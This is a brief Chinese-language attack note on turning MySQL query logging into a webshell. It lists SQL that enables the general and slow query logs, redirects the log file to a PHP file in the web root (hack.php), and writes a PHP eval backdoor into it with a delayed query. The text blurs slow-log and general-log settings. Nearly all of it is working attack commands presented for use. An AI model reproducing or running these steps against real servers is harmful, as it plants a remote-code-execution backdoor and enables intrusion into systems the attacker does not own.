日志Shell
主要使用慢日志getshell
- 进入sql语句执行处、一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下:
show global variables like '%long_query_time%'
可知延时为10s记录日志。
- 伪造(修改)slow_query_log_file日志文件的绝对路径以及文件名
show variables like'%general%';
然后打开并更改:
set global general_log = on;
set global general_log_file = 'C:\\phpStudy\\WWW\\hack.php';
后执行
select'<?php eval($_POST[2333]);?>' or sleep(11);
注意:开启延时:
set global slow_query_log=1; #开启
set global slow_query_log=0; #关闭